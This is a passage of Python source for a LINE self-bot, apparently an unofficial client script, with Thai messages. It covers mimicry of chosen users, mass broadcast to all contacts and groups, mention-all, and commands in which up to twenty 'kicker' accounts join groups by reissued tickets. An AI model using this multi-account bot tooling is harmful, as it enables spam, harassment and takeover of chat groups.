mid = mention['M']
profile = line.getContact(mid)
no += 1
res += '\n│ %i. %s' % (no, profile.statusMessage)
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, 'ไม่สามารถดึงสถานะได้, กรุณาแทคผู้ใช้ด้วย')
elif textsl.startswith('pict '):
res = '╭───「 Picture Status 」'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
if len(mentions['MENTIONEES']) == 1:
profile = line.getContact(mentions['MENTIONEES'][0]['M'])
if profile.pictureStatus:
path = 'http://dl.profile.line-cdn.net/' + profile.pictureStatus
line.sendImageWithURL(to, path)
return line.sendMessage(to, '「 Picture Status 」\n' + path)
else:
return line.sendMessage(to, 'ไม่สามารถดึงรูปได้, บุคคนนี้ `%s` doesn\'ไม่ได้ใส่รูปภาพโปรไฟล์' % profile.displayName)
for mention in mentions['MENTIONEES']:
mid = mention['M']
profile = line.getContact(mid)
no += 1
if profile.pictureStatus:
path = 'http://dl.profile.line-cdn.net/' + profile.pictureStatus
line.sendImageWithURL(to, path)
res += '\n│ %i. %s' % (no, path)
else:
res += '\n│ %i. Not Found' % no
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, 'ไม่สามารถดึงรูปได้, กรุณาแทคผู้ใช้ด้วย')
elif textsl.startswith('cover '):
res = '╭───「 Cover Picture 」'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
if len(mentions['MENTIONEES']) == 1:
mid = mentions['MENTIONEES'][0]['M']
cover = line.getProfileCoverURL(mid)
line.sendImageWithURL(to, str(cover))
line.sendMessage(to, '「 Cover Picture 」\n' + str(cover))
for mention in mentions['MENTIONEES']:
mid = mention['M']
no += 1
cover = line.getProfileCoverURL(mid)
line.sendImageWithURL(to, str(cover))
res += '\n│ %i. %s' % (no, cover)
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, 'ไม่สามารถดึงปกได้, กรุณาแทคผู้ใช้ด้วย')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('mimic'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
targets = ''
if settings['mimic']['target']:
no = 0
for target, status in settings['mimic']['target'].items():
no += 1
try:
name = line.getContact(target).displayName
except TalkException:
name = 'Unknown'
targets += '\n│ %i. %s//%s' % (no, name, bool_dict[status][1])
else:
targets += '\n│ Nothing'
res = '╭───「 Mimic 」'
res += '\n├ Status : ' + bool_dict[settings['mimic']['status']][1]
res += '\n├ List :'
res += targets
res += '\n├ Usage : '
res += '\n│ • {key}Mimic'
res += '\n│ • {key}Mimic <on/off>'
res += '\n│ • {key}Mimic Reset'
res += '\n│ • {key}Mimic Add <mention>'
res += '\n│ • {key}Mimic Del <mention>'
res += '\n╰───「SelfBot ProtectV2.2」'
if cmd == 'mimic':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl == 'on':
if settings['mimic']['status']:
line.sendMessage(to, 'เริ่มการล้อเลียน')
else:
settings['mimic']['status'] = True
line.sendMessage(to, 'เริ่มการล้อเลียน')
elif texttl == 'off':
if not settings['mimic']['status']:
line.sendMessage(to, 'ยกเลิกการล้อเลียน')
else:
settings['mimic']['status'] = False
line.sendMessage(to, 'ยกเลิกการล้อเลียน')
elif texttl == 'reset':
settings['mimic']['target'] = {}
line.sendMessage(to, 'รีเช็ตรายชื่อที่จะล้อเลี่ยนเรียบร้อย')
elif texttl.startswith('add '):
res = '╭───「 Mimic 」'
res += '\n├ Status : Add Target'
res += '\n├ Added :'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
settings['mimic']['target'][mid] = True
no += 1
try:
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
if no == 0: res += '\n│ Nothing'
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, res)
else:
line.sendMessage(to, 'ไม่สามารถเพื่มรายชื่อได้, กรุณาแทคผู้ใช้ด้วย')
elif texttl.startswith('del '):
res = '╭───「 Mimic 」'
res += '\n├ Status : Del Target'
res += '\n├ Deleted :'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid in settings['mimic']['target']:
settings['mimic']['target'][mid] = False
no += 1
try:
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
if no == 0: res += '\n│ Nothing'
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, res)
else:
line.sendMessage(to, 'ไม่สามารถลบรายชื่อได้, กรุณาแทคผู้ใช้ด้วย')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('broadcast'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cond = textt.split(' ')
res = '╭───「 Broadcast 」'
res += '\n├ Broadcast Type : '
res += '\n│ 1 : Friends'
res += '\n│ 2 : Groups'
res += '\n│ 0 : All'
res += '\n├ Usage : '
res += '\n│ • {key}Broadcast'
res += '\n│ • {key}Broadcast <type> <message>'
res += '\n╰───「SelfBot ProtectV2.2」'
if cmd == 'broadcast':
line.sendMessage(to, parsingRes(res).format(key=setKey.title()))
elif cond[0] == '1':
if len(cond) < 2:
return line.sendMessage(to, 'ไม่สามารถประกาศได้, ไม่พบข้อความ')
res = '「 Broadcast 」\n'
res += textt[2:]
res += '\n\n「SelfBot ProtectV2.2」'
targets = line.getAllContactIds()
for target in targets:
try:
line.sendMessage(target, res)
except TalkException:
targets.remove(target)
continue
time.sleep(0.8)
line.sendMessage(to, 'ประกาศเรียบร้อย, จำนวน %i คน' % len(targets))
elif cond[0] == '2':
if len(cond) < 2:
return line.sendMessage(to, 'ไม่สามารถประกาศได้, ไม่พบข้อความ')
res = '「 Broadcast 」\n'
res += textt[2:]
res += '\n\n「SelfBot ProtectV2.2」'
targets = line.getGroupIdsJoined()
for target in targets:
try:
line.sendMessage(target, res)
except TalkException:
targets.remove(target)
continue
time.sleep(0.8)
line.sendMessage(to, 'ประกาศเรียบร้อย, จำนวน %i กลุ่ม' % len(targets))
elif cond[0] == '0':
if len(cond) < 2:
return line.sendMessage(to, 'ไม่สามารถประกาศได้, ไม่พบข้อความ')
res = '「 Broadcast 」\n'
res += textt[2:]
res += '\n\n「SelfBot ProtectV2.2」'
targets = line.getGroupIdsJoined() + line.getAllContactIds()
for target in targets:
try:
line.sendMessage(target, res)
except TalkException:
targets.remove(target)
continue
time.sleep(0.8)
line.sendMessage(to, 'ประกาศเรียบร้อย, จำนวน %i ' % len(targets))
else:
line.sendMessage(to, parsingRes(res).format(key=setKey.title()))
elif cmd.startswith('friendlist'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cids = line.getAllContactIds()
cids.sort()
cnames = []
ress = []
res = '╭───「 Friend List 」'
res += '\n├ List:'
if cids:
contacts = []
no = 0
if len(cids) > 200:
parsed_len = len(cids)//200+1
for point in range(parsed_len):
for cid in cids[point*200:(point+1)*200]:
try:
contact = line.getContact(cid)
contacts.append(contact)
except TalkException:
cids.remove(cid)
continue
no += 1
res += '\n│ %i. %s' % (no, contact.displayName)
cnames.append(contact.displayName)
if res:
if res.startswith('\n'): res = res[1:]
if point != parsed_len - 1:
ress.append(res)
if point != parsed_len - 1:
res = ''
else:
for cid in cids:
try:
contact = line.getContact(cid)
contacts.append(contact)
except TalkException:
cids.remove(cid)
continue
no += 1
res += '\n│ %i. %s' % (no, contact.displayName)
cnames.append(contact.displayName)
else:
res += '\n│ Nothing'
res += '\n├ Usage : '
res += '\n│ • {key}FriendList'
res += '\n│ • {key}FriendList Info <num/name>'
res += '\n│ • {key}FriendList Add <mention>'
res += '\n│ • {key}FriendList Del <mention/num/name/all>'
res += '\n╰───「SelfBot ProtectV2.2」'
ress.append(res)
if cmd == 'friendlist':
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl.startswith('info '):
texts = textt[5:].split(', ')
if not cids:
return line.sendMessage(to, 'แสดงข้อมูลเพื่อนล้มเหลว, ไม่พบเพื่อน')
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
contact = contacts[num - 1]
if contact.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + contact.pictureStatus)
cover = line.getProfileCoverURL(contact.mid)
line.sendImageWithURL(to, str(cover))
res = '╭───「 Contact Info 」'
res += '\n├ MID : ' + contact.mid
res += '\n├ Display Name : ' + str(contact.displayName)
if contact.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(contact.displayNameOverridden)
res += '\n├ Status Message : ' + str(contact.statusMessage)
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
elif name != None:
if name in cnames:
contact = contacts[cnames.index(name)]
if contact.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + contact.pictureStatus)
cover = line.getProfileCoverURL(contact.mid)
line.sendImageWithURL(to, str(cover))
res = '╭───「 Contact Info 」'
res += '\n├ MID : ' + contact.mid
res += '\n├ Display Name : ' + str(contact.displayName)
if contact.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(contact.displayNameOverridden)
res += '\n├ Status Message : ' + str(contact.statusMessage)
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
elif texttl.startswith('add '):
res = '╭───「 Friend List 」'
res += '\n├ Status : Add Friend'
res += '\n├ Added :'
no = 0
added = []
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid in cids or mid in added:
continue
no += 1
try:
line.findAndAddContactsByMid(mid)
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
added.append(mid)
if no == 0: res += '\n│ Nothing'
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, res)
else:
line.sendMessage(to, 'ไม่สามารถแอดเพื่อนได้, กรุณาแทคผู้ใช้ด้วย')
elif texttl.startswith('del '):
texts = textt[4:].split(', ')
if not cids:
return line.sendMessage(to, 'เปิดข้อผิดพลาดที่ไม่แน่ชัด')
res = '╭───「 Friend List 」'
res += '\n├ Status : Del Friend'
res += '\n├ Deleted :'
no = 0
deleted = []
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid not in cids or mid in deleted:
continue
no += 1
try:
line.deleteContact(mid)
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(mid)
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
contact = contacts[num - 1]
if contact.mid not in cids and contact.mid in deleted:
continue
no += 1
try:
line.deleteContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
elif name != None:
if name in cnames:
contact = contacts[cnames.index(name)]
if contact.mid not in cids and contact.mid in deleted:
continue
no += 1
try:
line.deleteContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
elif name.lower() == 'all':
for contact in contacts:
if contact.mid not in cids and contact.mid in deleted:
continue
no += 1
try:
line.deleteContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
time.sleep(0.8)
else:
line.sendMessage(to, 'Failed del friend with name `%s`, ไม่พบชื่อกลุ่มนี้ ♪' % name)
if no == 0: res += '\n│ Nothing'
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, res)
else:
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('blocklist'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cids = line.getBlockedContactIds()
cids.sort()
cnames = []
ress = []
res = '╭───「 Block List 」'
res += '\n├ List:'
if cids:
contacts = []
no = 0
if len(cids) > 200:
parsed_len = len(cids)//200+1
for point in range(parsed_len):
for cid in cids[point*200:(point+1)*200]:
try:
contact = line.getContact(cid)
contacts.append(contact)
except TalkException:
cids.remove(cid)
continue
no += 1
res += '\n│ %i. %s' % (no, contact.displayName)
cnames.append(contact.displayName)
if res:
if res.startswith('\n'): res = res[1:]
if point != parsed_len - 1:
ress.append(res)
if point != parsed_len - 1:
res = ''
else:
for cid in cids:
try:
contact = line.getContact(cid)
contacts.append(contact)
except TalkException:
cids.remove(cid)
continue
no += 1
res += '\n│ %i. %s' % (no, contact.displayName)
cnames.append(contact.displayName)
else:
res += '\n│ Nothing'
res += '\n├ Usage : '
res += '\n│ • {key}BlockList'
res += '\n│ • {key}BlockList Info <num/name>'
res += '\n│ • {key}BlockList Add <mention>'
res += '\n│ • {key}BlockList Del <mention/num/name/all>'
res += '\n╰───「SelfBot ProtectV2.2」'
ress.append(res)
if cmd == 'blocklist':
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl.startswith('info '):
texts = textt[5:].split(', ')
if not cids:
return line.sendMessage(to, 'แสดงข้อมูลผู้ใช้ที่ถูกบล็อกล้มเหลว, ไม่มีผู้ใช้ในรายการ')
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
contact = contacts[num - 1]
if contact.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + contact.pictureStatus)
cover = line.getProfileCoverURL(contact.mid)
line.sendImageWithURL(to, str(cover))
res = '╭───「 Contact Info 」'
res += '\n├ MID : ' + contact.mid
res += '\n├ Display Name : ' + str(contact.displayName)
if contact.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(contact.displayNameOverridden)
res += '\n├ Status Message : ' + str(contact.statusMessage)
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
elif name != None:
if name in cnames:
contact = contacts[cnames.index(name)]
if contact.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + contact.pictureStatus)
cover = line.getProfileCoverURL(contact.mid)
line.sendImageWithURL(to, str(cover))
res = '╭───「 Contact Info 」'
res += '\n├ MID : ' + contact.mid
res += '\n├ Display Name : ' + str(contact.displayName)
if contact.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(contact.displayNameOverridden)
res += '\n├ Status Message : ' + str(contact.statusMessage)
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
elif texttl.startswith('add '):
res = '╭───「 Block List 」'
res += '\n├ Status : Add Block'
res += '\n├ Added :'
no = 0
added = []
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid in cids or mid in added:
continue
no += 1
try:
line.blockContact(mid)
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
added.append(mid)
if no == 0: res += '\n│ Nothing'
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, res)
else:
line.sendMessage(to, 'Failed block contact, กรุณาแทคผู้ใช้ด้วย')
elif texttl.startswith('del '):
texts = textt[4:].split(', ')
if not cids:
return line.sendMessage(to, 'ไม่สามาถปลกบล็อคได้, ไม่มีผู้ใช้ในรายการ')
res = '╭───「 Block List 」'
res += '\n├ Status : Del Block'
res += '\n├ Deleted :'
no = 0
deleted = []
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid not in cids or mid in deleted:
continue
no += 1
try:
line.unblockContact(mid)
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(mid)
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
contact = contacts[num - 1]
if contact.mid not in cids and contact.mid in deleted:
continue
no += 1
try:
line.unblockContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
elif name != None:
if name in cnames:
contact = contacts[cnames.index(name)]
if contact.mid not in cids and contact.mid in deleted:
continue
no += 1
try:
line.unblockContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
elif name.lower() == 'all':
for contact in contacts:
if contact.mid not in cids and contact.mid in deleted:
continue
no += 1
try:
line.unblockContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
time.sleep(0.8)
else:
line.sendMessage(to, 'ไม่สามารถปลดบล็อกรายชื่อนี้ได้ `%s`, ชื่อไม่อยู่ในรายการ ♪' % name)
if no == 0: res += '\n│ Nothing'
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, res)
else:
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif msg.text.lower() == ".getjoined":
line.sendMessage(to,"กรุณารอสักครู่ ใจเย็นๆ")
all = line.getGroupIdsJoined()
text = ""
cnt = 0
for i in all:
text += line.getGroup(i).name + "\n" + i + "\n\n"
cnt += 1
if cnt == 10:
line.sendMessage(to,text[:-2])
text = ""
cnt = 0
line.sendMessage(to,text[:-2])
cnt = 0
elif "kickejoinid " in msg.text.lower():
spl = re.split("kickejoinid ",msg.text,flags=re.IGNORECASE)
if spl[0] == "":
gid = spl[1]
x = line.getGroup(gid)
if Amid not in [i.mid for i in x.members]:
if x.preventedJoinByTicket == False:
ticket = line.reissueGroupTicket(gid)
kicker.acceptGroupInvitationByTicket(gid,ticket)
kicker2.acceptGroupInvitationByTicket(gid,ticket)
kicker3.acceptGroupInvitationByTicket(gid,ticket)
kicker4.acceptGroupInvitationByTicket(gid,ticket)
kicker5.acceptGroupInvitationByTicket(gid,ticket)
kicker6.acceptGroupInvitationByTicket(gid,ticket)
kicker7.acceptGroupInvitationByTicket(gid,ticket)
kicker8.acceptGroupInvitationByTicket(gid,ticket)
kicker9.acceptGroupInvitationByTicket(gid,ticket)
kicker10.acceptGroupInvitationByTicket(gid,ticket)
else:
sirilist = [i.mid for i in x.members if any(word in i.displayName for word in ["Doctor.A","Eliza","Parry","Rakko","しりちゃん"]) or i.displayName.isdigit()]
if sirilist == []:
x.preventedJoinByTicket = False
line.updateGroup(x)
ticket = line.reissueGroupTicket(gid)
kicker.acceptGroupInvitationByTicket(gid,ticket)
kicker2.acceptGroupInvitationByTicket(gid,ticket)
kicker3.acceptGroupInvitationByTicket(gid,ticket)
kicker4.acceptGroupInvitationByTicket(gid,ticket)
kicker5.acceptGroupInvitationByTicket(gid,ticket)
kicker6.acceptGroupInvitationByTicket(gid,ticket)
kicker7.acceptGroupInvitationByTicket(gid,ticket)
kicker8.acceptGroupInvitationByTicket(gid,ticket)
kicker9.acceptGroupInvitationByTicket(gid,ticket)
kicker10.acceptGroupInvitationByTicket(gid,ticket)
kicker.sendMessage(gid,"โหมดคุ้มกันแอดมินทำงาน (`・ω・´)")
else:
line.inviteIntoGroup(gid,[Amid])
x.preventedJoinByTicket = True
line.updateGroup(x)
kicker.sendMessage(gid,"โหมดคุ้มกันแอดมินทำงาน (`・ω・´)")
else:
line.sendMessage(to,"kicker อยู่ในกลุ่มอยู่แล้ว")
elif cmd == "^^":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
x = line.getGroup(msg.to)
if x.preventedJoinByTicket:
x.preventedJoinByTicket = False
line.updateGroup(x)
Ticket = line.reissueGroupTicket(msg.to)
kicker.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker2.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker3.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker4.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker5.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker6.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker7.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker8.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker9.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker10.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker11.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker12.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker13.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker14.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker15.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker16.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker17.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker18.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker19.acceptGroupInvitationByTicket(msg.to,Ticket)
kicker20.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kicker.getGroup(msg.to)
G.preventedJoinByTicket = True
random.choice(ABC).updateGroup(G)
kicker.sendMessage(msg.to,"โหมดคุ้มกันแอดมินทำงาน (`・ω・´)")
elif "kickerleave " in msg.text.lower():
spl = re.split("kickerleave ",msg.text,flags=re.IGNORECASE)
if spl[0] == "":
try:
kicker.leaveGroup(spl[1])
kicker2.leaveGroup(spl[1])
kicker3.leaveGroup(spl[1])
kicker4.leaveGroup(spl[1])
kicker5.leaveGroup(spl[1])
kicker6.leaveGroup(spl[1])
kicker7.leaveGroup(spl[1])
kicker8.leaveGroup(spl[1])
kicker9.leaveGroup(spl[1])
kicker10.leaveGroup(spl[1])
except Exception as e:
line.sendMessage(to,str(e))
#===========BOT UPDATE============#
elif msg.text.lower().startswith("mentionall"):
if msg._from in admin:
data = msg.text[len("mentionall"):].strip()
if data == "":
group = line.getGroup(msg.to)
nama = [contact.mid for contact in group.members if contact.mid != zxcvzx]
cb = ""
cb2 = ""
count = 1
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
for md in nama:
akh = akh + len(str(count)) + 2 + 5
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + len(str(count+1)) + 2 + 6
akh = akh + 1
cb2 += str(count)+". @name\n"
cnt = cnt + 1
if cnt == 20:
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
cb = ""
cb2 = ""
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
count += 1
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
elif data[0] == "<":
mentargs = int(data[1:].strip())
group = line.getGroup(msg.to)
nama = [contact.mid for contact in group.members if contact.mid != zxcvzx]
cb = ""
cb2 = ""
count = 1
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
for md in nama:
if count > mentargs:
break
akh = akh + len(str(count)) + 2 + 5
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + len(str(count+1)) + 2 + 6
akh = akh + 1
cb2 += str(count)+". @name\n"
cnt = cnt + 1
if cnt == 20:
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
cb = ""
cb2 = ""
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
count += 1
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
elif data[0] == ">":
mentargs = int(data[1:].strip())
group = line.getGroup(msg.to)
nama = [contact.mid for contact in group.members if contact.mid != zxcvzx]
cb = ""
cb2 = ""
count = 1
if mentargs >= 0:
strt = len(str(mentargs)) + 2
else:
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
for md in nama:
if count < mentargs:
count += 1
continue
akh = akh + len(str(count)) + 2 + 5
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + len(str(count+1)) + 2 + 6
akh = akh + 1
cb2 += str(count)+". @name\n"
cnt = cnt + 1
if cnt == 20:
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
cb = ""
cb2 = ""
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
count += 1
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
elif data[0] == "=":
mentargs = int(data[1:].strip())
group = line.getGroup(msg.to)
nama = [contact.mid for contact in group.members if contact.mid != zxcvzx]
cb = ""
cb2 = ""
count = 1
akh = int(0)
cnt = 0
for md in nama:
if count != mentargs:
count += 1
continue
akh = akh + len(str(count)) + 2 + 5
strt = len(str(count)) + 2
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + len(str(count+1)) + 2 + 6
akh = akh + 1
cb2 += str(count)+". @name\n"
cnt = cnt + 1
if cnt == 20:
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
cb = ""
cb2 = ""
strt = len(str(count)) + 2
akh = int(0)
cnt = 0
count += 1
cb = (cb[:int(len(cb)-1)])
cb2 = cb2[:-1]
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
except:
line.sendMessage(msg.to,"[[NO MENTION]]")
elif cmd == 'groupinfo':
if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถดูข้อมูลกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
group = line.getGroup(to)
try:
ccreator = group.creator.mid
gcreator = group.creator.displayName
except:
ccreator = None
gcreator = 'Not found'
if not group.invitee:
pendings = 0
else:
pendings = len(group.invitee)
qr = 'Close' if group.preventedJoinByTicket else 'Open'
if group.preventedJoinByTicket:
ticket = 'Not found'
else:
ticket = 'https://line.me/R/ti/g/' + str(line.reissueGroupTicket(group.id))
created = time.strftime('%d-%m-%Y %H:%M:%S', time.localtime(int(group.createdTime) / 1000))
path = 'http://dl.profile.line-cdn.net/' + group.pictureStatus
res = '╭───「 Group Info 」'
res += '\n├ ID : ' + group.id
res += '\n├ Name : ' + group.name
res += '\n├ Creator : ' + gcreator
res += '\n├ Created Time : ' + created
res += '\n├ Member Count : ' + str(len(group.members))
res += '\n├ Pending Count : ' + str(pendings)
res += '\n├ QR Status : ' + qr
res += '\n├ Ticket : ' + ticket
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendImageWithURL(to, path)
if ccreator:
line.sendContact(to, ccreator)
line.sendMessage(to, res)
elif cmd.startswith('grouplist'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
gids = line.getGroupIdsJoined()
gnames = []
ress = []
